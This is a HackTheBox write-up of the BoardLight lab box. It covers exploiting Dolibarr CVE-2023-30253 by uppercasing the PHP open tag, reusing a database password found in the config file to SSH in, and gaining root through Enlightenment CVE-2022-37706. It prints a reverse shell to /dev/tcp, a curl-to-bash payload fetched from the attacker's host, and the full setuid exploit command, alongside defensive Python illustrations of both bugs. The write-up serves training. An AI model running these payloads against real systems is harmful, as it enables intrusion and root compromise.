BoardLight from HackTheBox

This box involves exploiting Dolibarr 17.0.0 for remote code execution (RCE) as an authenticated user, gaining access as the www-data user. Understanding the exploit and examining the configuration files turns up credentials that let us escalate to a user account. Additionally, the system is vulnerable to CVE-2022-37706, which allows further privilege escalation to root.

Nmap scan

First, we check for open ports:

nmap -sV -sC 10.10.11.11 -v
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have web and ssh services running.

Web enumeration

Checking the page source, I found a domain:

└─$ curl -s http://10.10.11.11 |grep htb
                [email protected]
      <a href="https://html.design/">Board.htb</a>

We can add it to the hosts file:

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

And there is a commented-out link in the page:

curl http://board.htb | grep '<!'
  <!-- Basic -->
  <!-- Mobile Metas -->
  <!-- Site Metas -->
  <!-- slider stylesheet -->
  <!-- slider stylesheet -->
  <!-- bootstrap core css -->
  <!-- fonts style -->
  <!-- Custom styles for this template -->
  <!-- responsive style -->
    <!-- header section strats -->
                <!--   <a class="nav-link" href="portfolio.php"> Portfolio </a> -->

The page http://board.htb/portfolio.php exists, but we don't know its parameters. I tried to bruteforce them without any luck.

Subdomain enumeration

This step was really tricky. I am not sure why gobuster failed, so I tried multiple times with ffuf and finally got a hit:

ffuf -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -H "Host: FUZZ.board.htb" -fw 6243 -u http://board.htb
 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6243
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 107ms]

We can add this subdomain to the hosts file as well:

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

CVE-2023-30253

Checking the page http://crm.board.htb/

It's Dolibarr 17.0.0. Searching for CVEs related to this version quickly revealed CVE-2023-30253.

CVE-2023-30253 is a critical vulnerability in Dolibarr versions before 17.0.1 that allows remote code execution (RCE) by an authenticated user. The website module strips PHP code from user-supplied page content, but the check only matched the lowercase open tag, so writing <?PHP instead of <?php bypasses it and the code runs when the page is rendered with dynamic content enabled. Exploiting it requires an account that can create and edit website pages; once the filter bypass is understood, executing commands on the target is straightforward.
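To make the bypass concrete from a defender's side, here is an added illustration (not Dolibarr's code, and not the exploit script) contrasting an assumed case-sensitive open-tag check with a case-insensitive one, plus a small audit pass over constructed sample pages that shows which stored pages would slip through the weak check:

```python
import re

# Constructed sample page bodies (not taken from Dolibarr): what the website
# module receives when an authenticated user saves a page's HTML source.
SAMPLE_PAGES = {
    1: "<h1>Board.htb</h1><p>Welcome to our CRM</p>",
    2: "<?php echo system('id'); ?>",          # blocked by the original filter
    3: "<?PHP echo system('id'); ?>",          # the CVE-2023-30253 bypass
    4: "<p>price</p><?= shell_exec('id') ?>",  # short echo tag, also PHP
    5: "<?xml version='1.0'?><note>x</note>",  # not PHP, must not be flagged
}


def naive_has_php(html: str) -> bool:
    """Case-sensitive check of the kind the advisory describes: an assumed
    simplification of the pre-17.0.1 behaviour, not Dolibarr's own code."""
    return "<?php" in html


def hardened_has_php(html: str) -> bool:
    """Case-insensitive match for every PHP open-tag form ('<?php', '<?=',
    '<? ') so changing the case of the tag no longer slips through."""
    return re.search(r"<\?(?:php\b|=|\s)", html, re.IGNORECASE) is not None


def audit_pages(pages: dict[int, str]) -> list[int]:
    """Detection view: ids of stored pages carrying PHP that the hardened
    check sees but the naive one misses, i.e. what to review on 17.0.0."""
    return sorted(pid for pid, body in pages.items()
                  if hardened_has_php(body) and not naive_has_php(body))


if __name__ == "__main__":
    for pid, body in SAMPLE_PAGES.items():
        print(pid, naive_has_php(body), hardened_has_php(body))
    print("pages needing review:", audit_pages(SAMPLE_PAGES))
```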

First shell

I searched for the default credentials for Dolibarr, which are admin:admin.

Following the article where I found the CVE details, I was able to get command execution!

So we can create a bash reverse shell, saved as shell.sh:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.x/4444 0>&1

Run a listener on port 4444:

nc -vlp 4444

From another terminal, host the shell script:

python3 -m http.server

Go to http://crm.board.htb/website/index.php and create a website called test.

Then create a page called test.

Finally, click on Edit HTML source and insert the payload (adding the payload directly to the page content works as well):

<?PHP echo system("curl http://10.10.16.x:8000/shell.sh | bash");?>
💡 Make sure to enable Show dynamic content

And we get a shell back:

└─$ nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.x] from board.htb [10.10.11.11] 45992
bash: cannot set terminal process group (885): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ 

Second way

Searching for the exploit using poc-seeker:

GitHub - 0xyassine/poc-seeker: automated tool designed to streamline the search and identification of Proofs of Concept (POCs)
-----------------------------
-> CVE id              : CVE-2023-30253
-> CVE description     : Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
-> Base score          : 8.8
-> Attack complexity   : LOW
-> User interaction    : NONE
-> Required privileges : LOW
------------------------------

🤞   Searching github                  DONE
🤞   Searching sploitus                DONE
🤞   Searching exploit db              DONE
🤞   Searching vulnerability lab       DONE

😎 I think I've found potential POC for you 😎 

[+] https://github.com/04Shivam/CVE-2023-30253-Exploit 
[+] https://github.com/Rubikcuv5/cve-2023-30253 
[+] https://github.com/g4nkd/CVE-2023-30253-PoC 
[+] https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 

🧐 You may have a look at the following 🧐 

[!] -
[!] https://github.com/04Shivam/CVE-2023-30253
[!] https://github.com/andria-dev/DolibabyPhp
[!] https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253

Trying the first POC works:

└─$ python3 CVE-2023-30253.py 
Enter the domain name (eg: app.hackthebox.com)
>>>crm.board.htb
Enter the ip address for reverse shell
>>>10.10.14.x
Enter port number for reverse shell
>>>4444
[+] Username password used admin:admin
[+] Extracted CSRF Token
[+] Logged In successfully
[+] Website created successfully
[+] Page created successfully
[+] Payload uploaded
[+] Payload Execution Url: http://crm.board.htb/public/website/index.php?website=0e1fef09ad10419da88c72f0d7e986d9&pageid=4
[+] Check your listner
[+] Payload Executed

Own user

Listing the files and directories:

www-data@boardlight:~/html/crm.board.htb/htdocs$ ls -lht 
ls -lht 
total 576K
drwxr-xr-x   2 www-data www-data 4.0K May 17 00:18 conf
drwxr-xr-x  11 www-data www-data 4.0K Mar  4  2023 accountancy
drwxr-xr-x   9 www-data www-data 4.0K Mar  4  2023 adherents
drwxr-xr-x   6 www-data www-data 4.0K Mar  4  2023 admin

The modification date of the conf directory is interesting. Checking the config file:

www-data@boardlight:~/html/crm.board.htb/htdocs$ cat conf/conf.php
cat conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

Found a password: serverfun2$2023!!

To find the user, we can simply check /home (HackTheBox style), or list the users that have a login shell in /etc/passwd:

ls /home
larissa

Trying to ssh as larissa with the found password worked:

└─$ ssh [email protected]
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
[email protected]'s password: 
...
larissa@boardlight:~$ wc -c user.txt 
33 user.txt

Own root

Running linpeas revealed a few unknown setuid binaries:

PEASS-ng/linPEAS at master · peass-ng/PEASS-ng (Privilege Escalation Awesome Scripts SUITE)
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

This can also be done using:

find / -perm -4000 2>/dev/null

Checking the enlightenment version:

enlightenment --version
ESTART: 0.00002 [0.00002] - Begin Startup
ESTART: 0.00090 [0.00088] - Signal Trap
ESTART: 0.00115 [0.00025] - Signal Trap Done
ESTART: 0.00243 [0.00127] - Eina Init
ESTART: 0.00359 [0.00116] - Eina Init Done
ESTART: 0.00360 [0.00001] - Determine Prefix
ESTART: 0.00442 [0.00082] - Determine Prefix Done
ESTART: 0.00443 [0.00002] - Environment Variables
ESTART: 0.00444 [0.00001] - Environment Variables Done
ESTART: 0.00445 [0.00000] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!

The version is 0.23.1.

Searching for a CVE related to this version returns CVE-2022-37706.

CVE-2022-37706 is a critical local privilege escalation in Enlightenment: the setuid-root helper enlightenment_sys mishandles pathnames that begin with /dev/.. when it hands them to the system() library function, so a local user can get root.

Create a directory whose name triggers the pathname bug. The path includes "/dev/../tmp/;", which the vulnerable function handles in a special way, followed by /tmp/exploit:

mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

Create the exploit script:

echo "/bin/bash" > /tmp/exploit
chmod a+x /tmp/exploit

The exploit command:

/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

  1. /usr.../.. /bin/mount: executes the mount command through a potentially vulnerable function stored in the variable file.
  2. -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u): various mount options. The critical part here is uid=$(id -u), which runs the mount command with the current user's ID.
  3. "/dev/../tmp/;/tmp/exploit" /tmp///net: the key part of the exploit. This path abuses the pathname handling vulnerability to execute /tmp/exploit (which contains /bin/bash), giving a root shell.

Executing it:

larissa@boardlight:~$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
root@boardlight:/home/larissa# 
root@boardlight:/home/larissa# wc -c /root/root.txt 
33 /root/root.txt
root@boardlight:/home/larissa#
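To see why a "starts with /dev/" check is not enough on its own, here is an added illustration in Python (not Enlightenment's code and not the exploit) that contrasts a naive prefix check with one that normalises the path and rejects shell metacharacters, and a shell command string with the argv form a setuid helper should use; the crafted device argument is the one from the command above, the other inputs are constructed:

```python
import posixpath
import re

DEV_PREFIX = "/dev/"
# Characters a shell would interpret if the path were spliced into a
# command string, as happens when the helper builds one for system().
SHELL_META = re.compile(r"[;&|`$<>()\\'\"\s]")

# Constructed inputs: the device argument used in the writeup's command,
# an ordinary block device, and the mount point from the command.
CRAFTED_DEVICE = "/dev/../tmp/;/tmp/exploit"
NORMAL_DEVICE = "/dev/sdb1"
MOUNT_POINT = "/tmp///net"


def naive_is_device(path: str) -> bool:
    """Prefix-only check: anything that merely starts with /dev/ passes,
    including a path that immediately climbs back out with '..'."""
    return path.startswith(DEV_PREFIX)


def hardened_is_device(path: str) -> bool:
    """Normalise '.' and '..' lexically before testing the prefix, and
    refuse shell metacharacters outright. Assumed hardening for
    illustration, not Enlightenment's actual patch."""
    canon = posixpath.normpath(path)
    return canon.startswith(DEV_PREFIX) and SHELL_META.search(canon) is None


def mount_cmdline_unsafe(device: str, target: str) -> str:
    """One string handed to a shell: the ';' inside device ends the mount
    command and whatever follows it runs with the helper's privileges."""
    return f"/bin/mount -o nosuid,nodev {device} {target}"


def mount_argv_safe(device: str, target: str) -> list[str]:
    """argv form for execv(): the device is a single argument, so no shell
    ever sees the ';' and the worst case is a mount error."""
    return ["/bin/mount", "-o", "nosuid,nodev", device, target]


if __name__ == "__main__":
    for dev in (CRAFTED_DEVICE, NORMAL_DEVICE):
        print(f"{dev!r}: naive={naive_is_device(dev)} "
              f"hardened={hardened_is_device(dev)}")
    print(mount_cmdline_unsafe(CRAFTED_DEVICE, MOUNT_POINT))
    print(mount_argv_safe(CRAFTED_DEVICE, MOUNT_POINT))
```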

Finally the box is owned!
